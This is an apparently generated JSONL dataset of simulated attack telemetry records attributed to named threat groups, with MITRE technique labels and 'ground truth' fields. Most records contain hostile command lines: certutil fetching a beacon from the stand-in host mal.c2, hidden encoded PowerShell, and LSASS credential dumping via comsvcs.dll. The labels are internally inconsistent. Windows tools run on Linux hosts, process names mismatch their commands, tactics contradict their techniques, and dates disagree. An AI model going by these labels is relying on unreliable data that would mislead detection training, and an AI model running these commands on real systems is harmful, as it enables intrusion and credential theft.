text
stringlengths
1.13k
1.33k
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Reconnaissance"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20251003T101537000Z_0017201","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.195.32.74","name":"EC2-INST-ZWAQFTXTMV","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17201Scattered SpiderT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.125.10.137","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-09-24T14:25:53.000Z","user":{"name":"svc_h9l19h6jb46x","sid":"S-1-5-21-757546849-929763086-6724"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Persistence"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260908T204241000Z_0017203","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.56.30.117","name":"IAM-ROLE-KD5PVW3Y0G","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17203Volt TyphoonT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.171.84.197","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-05-19T11:13:23.000Z","user":{"name":"i-nk3n0a1anuar","sid":"S-1-5-21-734915560-987264590-1532"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Privilege Escalation"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20250714T120811000Z_0017205","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.88.31.91","name":"AZURE-VM-EIFLXARCKY","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17205APT29T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.66.119.23","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-12T10:26:12.000Z","user":{"name":"CORP\\rjlvd0vrj6y2","sid":"S-1-5-21-921783301-804392761-5250"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20261204T035651000Z_0017207","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.114.242.67","name":"EC2-INST-KEJ85W45J8","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17207Scattered SpiderT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.42.34.75","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-08T21:35:51.000Z","user":{"name":"i-mswidv4ulmjd","sid":"S-1-5-21-307743076-796920409-9516"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery","Credential Access","Execution"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20261114T115246000Z_0017209","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.116.87.228","name":"WIN-FIN-SRV-XG1OE8P58F","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17209APT41T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.13.176.248","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-24T13:38:28.000Z","user":{"name":"arn:aws:iam::zmojagw5cmjj","sid":"S-1-5-21-363391224-392796883-1147"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Reconnaissance","Privilege Escalation","Lateral Movement"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250621T065040000Z_0017211","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.168.155.54","name":"IAM-ROLE-J2BBHMW6PZ","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17211FIN7T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.165.67.73","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2845 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-19T05:08:47.000Z","user":{"name":"i-4e2yc0l5k4hg","sid":"S-1-5-21-241651622-139997558-3613"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Reconnaissance","Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20260107T162551000Z_0017213","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.184.11.148","name":"AZURE-VM-D0LGU3JGK0","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17213Mustang PandaT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.104.48.45","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-10T02:21:52.000Z","user":{"name":"arn:aws:iam::9q4eywerfw8s","sid":"S-1-5-21-415679134-987071891-7329"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Command and Control"],"technique_id":"T1531"},"event_id":"evt_apt29_20260506T082111000Z_0017215","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.42.58.211","name":"APP-WEB-OE3AGBM9I7","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17215APT29T1531"},"network":{"domain":"github.com","dst_ip":"1.180.13.95","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-11-25T08:13:23.000Z","user":{"name":"svc_c3sy9f8mibvn","sid":"S-1-5-21-740351959-891895090-2433"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Discovery","Impact","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260503T001617000Z_0017217","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.84.34.111","name":"EC2-INST-F1UTZMXVFA","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17217Volt TyphoonT1059.001"},"network":{"domain":"github.com","dst_ip":"1.53.26.175","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-23T04:53:48.000Z","user":{"name":"CORP\\0qwernr02c72","sid":"S-1-5-21-882970070-817828285-2858"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Persistence"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20250128T095354000Z_0017219","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.196.221.249","name":"APP-WEB-BMZMUVYBMT","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17219Volt TyphoonT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.105.83.207","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2149 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-12T01:53:39.000Z","user":{"name":"svc_s1y3x1xuex2w","sid":"S-1-5-21-158953248-418663209-4377"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250417T174126000Z_0017221","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.41.244.113","name":"IAM-ROLE-AQLDQ7GEOG","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17221Volt TyphoonT1531"},"network":{"domain":"github.com","dst_ip":"1.0.2.184","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-21T06:48:22.000Z","user":{"name":"CORP\\4d6i9frmda7v","sid":"S-1-5-21-614620187-722110214-1394"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_apt29_20250519T035955000Z_0017223","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.176.2.5","name":"WIN-FIN-SRV-0P4YDUOCR8","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17223APT29T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.79.166.114","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-23T03:20:14.000Z","user":{"name":"azuread\\l16b6qymel9v","sid":"S-1-5-21-881068784-123350621-2900"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Collection","Lateral Movement"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20250814T025447000Z_0017225","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.251.8.234","name":"DB-ORACLE-N2VYX9844Q","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17225FIN7T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.189.158.130","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1132 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-01-14T15:36:30.000Z","user":{"name":"CORP\\broe3qpxisll","sid":"S-1-5-21-716508264-129998039-7853"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Discovery","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20250319T082143000Z_0017227","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.113.180.114","name":"WIN-FIN-SRV-6MJ3G8U0NC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17227FIN7T1059.001"},"network":{"domain":"github.com","dst_ip":"1.2.30.45","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-11-03T14:18:04.000Z","user":{"name":"i-n4ojd6dvqgpr","sid":"S-1-5-21-685423573-493837552-6066"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Initial Access"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260323T202352000Z_0017229","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.11.203.31","name":"EC2-INST-CZE0S78TMG","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17229APT29T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.42.30.164","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-17T01:48:31.000Z","user":{"name":"arn:aws:iam::40z7pymq0kgd","sid":"S-1-5-21-667315938-400718820-2751"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Collection"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20260808T164117000Z_0017231","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.146.143.122","name":"DB-ORACLE-HDPG735S7V","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17231APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.114.50.71","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-12T03:20:03.000Z","user":{"name":"svc_4pev7bhjx1gd","sid":"S-1-5-21-123904511-955016251-2353"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control","Persistence","Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260515T181144000Z_0017233","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.21.140.241","name":"DB-ORACLE-9DI5QTWFDH","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17233UNC4841T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.175.6.195","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-05T17:57:58.000Z","user":{"name":"azuread\\kyb4dphykba8","sid":"S-1-5-21-232879739-807791145-9174"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Reconnaissance","Exfiltration"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20260518T054810000Z_0017235","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.146.32.10","name":"DB-ORACLE-G9PCDX8KVZ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17235APT41T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.53.108.192","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-19T05:47:47.000Z","user":{"name":"CORP\\hf8q2emefrgw","sid":"S-1-5-21-928574458-766204579-3080"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance","Collection"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20260405T231012000Z_0017237","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.173.72.130","name":"EC2-INST-NLM9YQ6C8R","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17237Lapsus$T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.5.118.92","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-06-29T23:46:52.000Z","user":{"name":"arn:aws:iam::4yjoecvp0j2o","sid":"S-1-5-21-148206923-926381688-6636"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery","Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20260323T172254000Z_0017239","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.146.58.161","name":"WIN-FIN-SRV-GJDDV1WSFH","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17239APT29T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.125.113.8","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-13T07:55:37.000Z","user":{"name":"arn:aws:iam::m6srz8eljvg5","sid":"S-1-5-21-231210812-708497250-5954"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Credential Access","Initial Access","Collection"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250517T002822000Z_0017241","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.168.39.51","name":"DB-ORACLE-PY8DYU8MM8","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17241APT41T1071.001"},"network":{"domain":"github.com","dst_ip":"1.155.123.52","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-06-14T07:49:08.000Z","user":{"name":"svc_xq43feqaqnsd","sid":"S-1-5-21-209549772-446951943-5411"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20260729T020132000Z_0017243","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.66.45.5","name":"EC2-INST-FJC0H6EN19","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17243APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.146.9.27","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3168 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-03T21:57:12.000Z","user":{"name":"i-1anwjjtpiziw","sid":"S-1-5-21-714128377-594423547-6456"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Exfiltration","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250101T114128000Z_0017245","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.165.36.39","name":"IAM-ROLE-NM4W572YVE","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17245Lapsus$T1546.003"},"network":{"domain":"github.com","dst_ip":"1.145.205.81","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-06-27T16:30:55.000Z","user":{"name":"CORP\\tn40eptbmukf","sid":"S-1-5-21-184275751-425832859-4683"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Lateral Movement","Impact"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20261105T052326000Z_0017247","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.92.103.113","name":"AZURE-VM-KL9VMQ4VI6","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17247Volt TyphoonT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.43.9.169","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin 